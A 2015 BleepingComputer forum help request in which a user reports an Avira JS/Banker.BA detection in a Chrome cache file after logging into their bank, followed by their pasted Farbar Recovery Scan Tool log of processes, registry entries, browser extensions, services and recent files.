Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

JS/Banker.BA (please help)


  • This topic is locked This topic is locked
9 replies to this topic

#1 GiakMind

GiakMind

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Roma, Italy
  • Local time:01:43 AM

Posted 12 August 2015 - 01:07 PM

Today, once I entered my password manually (I don't keep it saved) and pressed ok to log in my bank account, Avira sent me notification for this virus "JS/Banker.BA" in C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Cache\f_0207ab
once putted in quarantene, I tried to repeat the process and again it appears, with the same exact folder.
Is my password in serious danger? What do you suggest to do? Try to set another password from another PC?
 
Anyway, I attached FRST logs. Please, help me ASAP :(

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:11-08-2015 02
Ran by Gianluca (administrator) on GIANLUCA-PC (12-08-2015 20:01:23)
Running from D:\Download
Loaded Profiles: Gianluca (Available Profiles: Gianluca)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Italiano (Italia)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\LogiShrd\LVMVFM\UMVPFSrv.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
() C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
() C:\Program Files (x86)\ASUS\AAHM\1.00.13\aaHMSvc.exe
() C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(HP) C:\Windows\System32\HPSIsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Arobas Music) C:\Program Files (x86)\Guitar Pro 5\GP5.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avcenter.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11545192 2010-11-02] (Realtek Semiconductor)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [730416 2015-06-18] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe [134368 2015-07-02] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53288576 2015-06-29] (Skype Technologies S.A.)
HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\...\Run: [Google Update] => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe [107912 2014-10-24] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it/
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll [2015-05-16] (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2010-10-27] (Atheros Commnucations)
BHO-x32: Guida per l'accesso a Windows Live ID -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-05-16] (Oracle Corporation)
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2011-06-21] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2011-06-21] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2011-06-21] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2011-06-21] (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 62.94.0.41 62.94.0.42
Tcpip\..\Interfaces\{7663439B-6298-43A5-9DA7-975D178A3E1E}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{95EA0000-E5C6-49C9-B36B-D0294C8C8227}: [DhcpNameServer] 62.94.0.41 62.94.0.42
Tcpip\..\Interfaces\{B53171CC-A761-4D0C-9E83-9148DB0AEF08}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{C4FB4A32-AE7D-4D9E-9FB9-F76219ECB3A9}: [DhcpNameServer] 62.94.0.41 62.94.0.42

FireFox:
========
FF ProfilePath: C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default
FF Homepage: hxxp://www.google.it/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_209.dll [2015-08-10] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-08-10] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2011-07-14] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2011-07-19] (Foxit Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-05-16] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-05-16] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin HKU\S-1-5-21-1973368479-3414220156-1287075655-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Gianluca\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll [2014-07-24] (Skype Limited)
FF Plugin HKU\S-1-5-21-1973368479-3414220156-1287075655-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin HKU\S-1-5-21-1973368479-3414220156-1287075655-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll [2012-12-03] (Apple Inc.)
FF Extension: Avira Browser Safety - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\abs@avira.com [2015-08-10]
FF Extension: Firebug - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\firebug@software.joehewitt.com.xpi [2012-10-01]
FF Extension: Video DownloadHelper - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2015-03-17]
FF Extension: Adblock Plus - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-10-01]
FF Extension: QuickJava - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\{E6C1199F-E687-42da-8C24-E7770CC3AE66}.xpi [2015-05-16]

Chrome:
=======
CHR Profile: C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-09-17]
CHR Extension: (Google Drive) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-09-17]
CHR Extension: (YouTube) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-01-26]
CHR Extension: (Google Search) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-01-26]
CHR Extension: (AdBlock) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2013-09-17]
CHR Extension: (Hola Better Internet) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2015-01-06]
CHR Extension: (Bookmark Manager) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-04-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-04-16]
CHR Extension: (Google Wallet) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-01-26]
CHR Profile: C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Docs) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-07]
CHR Extension: (Google Drive) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-05-07]
CHR Extension: (YouTube) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-05-07]
CHR Extension: (Google Search) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-05-07]
CHR Extension: (AdBlock) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-05-08]
CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2015-05-07]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-05-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-05-07]
CHR Extension: (Gmail) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-07]
CHR Profile: C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2
CHR Extension: (Google Slides) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-05-07]
CHR Extension: (Google Docs) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-07]
CHR Extension: (Google Drive) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-05-07]
CHR Extension: (YouTube) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-05-07]
CHR Extension: (Google Search) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-05-07]
CHR Extension: (Google Sheets) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-05-07]
CHR Extension: (Avira Browser Safety) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2015-05-07]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-05-07]
CHR Extension: (Google Wallet) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-05-07]
CHR Extension: (Gmail) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-07]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [827184 2015-06-18] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [450808 2015-06-18] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [450808 2015-06-18] (Avira Operations GmbH & Co. KG)
S4 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\AVWEBGRD.EXE [1187336 2015-06-18] (Avira Operations GmbH & Co. KG)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe [918144 2010-11-03] ()
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.13\aaHMSvc.exe [915584 2010-12-02] ()
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe [586880 2010-10-21] ()
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [52896 2010-10-27] (Atheros Commnucations) [File not signed]
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [218816 2015-07-02] (Avira Operations GmbH & Co. KG)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2014-11-05] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 amdkmpfd; C:\Windows\System32\DRIVERS\amdkmpfd.sys [62152 2014-10-28] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-24] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2010-08-03] ()
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [153256 2015-06-18] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [132656 2015-06-18] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-11-29] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [44088 2015-03-10] (Avira Operations GmbH & Co. KG)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2015-05-14] (Malwarebytes Corporation)
S3 mvusbews; C:\Windows\System32\Drivers\mvusbews.sys [20480 2012-09-26] (Marvell Semiconductor, Inc.)
S3 usbrndis6; C:\Windows\System32\DRIVERS\usb80236.sys [19968 2009-07-14] (Microsoft Corporation)
S3 catchme; \??\C:\54665465465322111\catchme.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-08-12 19:51 - 2015-08-12 19:51 - 00000000 ____D C:\AdwCleaner
2015-08-11 00:48 - 2015-08-11 00:49 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-08-12 20:01 - 2015-05-07 20:38 - 00000000 ____D C:\FRST
2015-08-12 19:38 - 2014-01-19 16:10 - 00000000 ____D C:\Program Files (x86)\Steam
2015-08-12 19:37 - 2012-01-26 14:33 - 00001172 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA.job
2015-08-12 19:13 - 2012-03-25 22:03 - 00001190 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA.job
2015-08-12 16:13 - 2012-03-25 22:03 - 00001168 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core.job
2015-08-12 15:41 - 2010-11-21 17:30 - 00743158 _____ C:\Windows\system32\perfh010.dat
2015-08-12 15:41 - 2010-11-21 17:30 - 00147840 _____ C:\Windows\system32\perfc010.dat
2015-08-12 15:41 - 2009-07-14 07:13 - 01665802 _____ C:\Windows\system32\PerfStringBackup.INI
2015-08-12 15:36 - 2013-12-07 16:31 - 00000000 ____D C:\Users\Gianluca\AppData\Roaming\Skype
2015-08-12 14:39 - 2015-05-19 21:41 - 00000176 _____ C:\Windows\SysWOW64\msvcsv60.dll
2015-08-12 14:39 - 2013-03-01 14:53 - 00000176 _____ C:\Windows\SysWOW64\w3data.vss
2015-08-12 14:39 - 2013-03-01 14:53 - 00000176 _____ C:\Windows\msocreg32.dat
2015-08-12 13:19 - 2011-07-09 12:55 - 01974158 _____ C:\Windows\WindowsUpdate.log
2015-08-12 13:15 - 2014-11-26 10:40 - 00000266 _____ C:\Windows\Tasks\AutoKMS.job
2015-08-12 13:15 - 2012-02-12 17:22 - 00799029 _____ C:\Windows\setupact.log
2015-08-12 13:15 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-08-11 10:37 - 2012-01-26 14:33 - 00001120 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core.job
2015-08-11 10:36 - 2012-10-01 17:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-08-11 10:36 - 2012-04-02 13:49 - 00205338 _____ C:\Windows\PFRO.log
2015-08-10 12:15 - 2012-04-09 20:35 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-08-10 12:15 - 2011-07-09 17:03 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-08-08 23:52 - 2013-12-12 23:31 - 00000000 ____D C:\ProgramData\Package Cache
2015-08-08 23:52 - 2013-08-13 00:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-07-22 14:45 - 2011-07-10 16:55 - 00000000 ____D C:\Users\Gianluca\AppData\Local\CrashDumps
2015-07-16 10:32 - 2012-01-26 14:33 - 00004152 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA
2015-07-16 10:32 - 2012-01-26 14:33 - 00003756 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core
2015-07-15 09:46 - 2014-11-10 16:32 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-07-15 09:45 - 2013-12-07 16:30 - 00000000 ____D C:\ProgramData\Skype
2015-07-14 16:52 - 2013-12-07 18:19 - 00000000 ____D C:\Users\Gianluca\AppData\Local\Pinnacle
2015-07-14 15:30 - 2013-12-07 18:35 - 00007680 _____ C:\Users\Gianluca\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

==================== Files in the root of some directories =======

2012-11-18 16:04 - 2012-11-18 16:04 - 0000132 _____ () C:\Users\Gianluca\AppData\Roaming\Adobe PNG Format CS5 Prefs
2013-12-07 18:35 - 2015-07-14 15:30 - 0007680 _____ () C:\Users\Gianluca\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-14 19:05 - 2015-05-14 19:05 - 0000218 _____ () C:\Users\Gianluca\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\Gianluca\AppData\Local\Temp\avgnt.exe
C:\Users\Gianluca\AppData\Local\Temp\Quarantine.exe
C:\Users\Gianluca\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
